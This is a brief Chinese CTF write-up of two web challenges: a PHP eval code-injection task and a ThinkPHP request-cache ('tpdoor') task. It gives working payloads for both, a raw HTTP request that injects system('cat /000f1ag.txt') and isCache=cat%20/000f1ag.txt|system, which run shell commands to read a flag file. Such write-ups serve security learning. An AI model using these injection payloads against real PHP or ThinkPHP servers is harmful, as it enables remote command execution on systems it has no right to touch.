#下班之前写了两个题，后面继续发

Codeinject

<?php

#Author: h1xa

error_reporting(0);
show_source(__FILE__);

eval("var_dump((Object)$_POST[1]);");

payload 闭合后面的括号来拼接

POST / HTTP/1.1
Host: 1dc86f1a-cccc-4298-955d-e9179f026d54.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

1="whoami");system('cat /000f1ag.txt'

tpdoor

#原来CTF还可以这样做

首先下载官方提供的部分源码

发现isCache是可控的参数 另外这是thinkphp的源码，要想获取flag根据有限的源码是没有看到什么漏洞可以配合参数进行利用的，那么这里的考点就是thinkphp的漏洞了，iscache是可控的，那么看看thinkphp的源码

全集搜索request_cache_key

在这个config参数中有request_cache_key

再看这里也有个request_cache_key

getRequestCache给key赋值了并且return 如同最终key传到了parseCacheKey中

看看这个函数如下 将$key以 | 分隔开 | 后面的所有fun key作为参数值 构造payload：whoami|system

读取flag的payload：isCache=cat%20/000f1ag.txt|system